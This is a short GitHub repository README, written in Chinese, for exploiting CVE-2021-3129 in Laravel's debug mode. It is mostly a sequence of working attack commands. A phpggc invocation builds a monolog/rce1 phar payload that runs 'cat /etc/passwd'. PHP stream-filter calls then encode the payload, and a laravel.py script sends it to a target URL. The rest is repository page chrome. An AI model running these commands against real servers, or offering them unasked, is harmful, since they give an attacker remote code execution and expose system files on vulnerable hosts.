生成自定义命令的phar包:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0
php -a 进入php命令行环境
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));
将生成好的payload保存为一个文件,然后利用脚本指定:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
-
Notifications
You must be signed in to change notification settings - Fork 1
0nion1/CVE-2021-3129
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
CVE-2021-3129-Laravel Debug mode
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published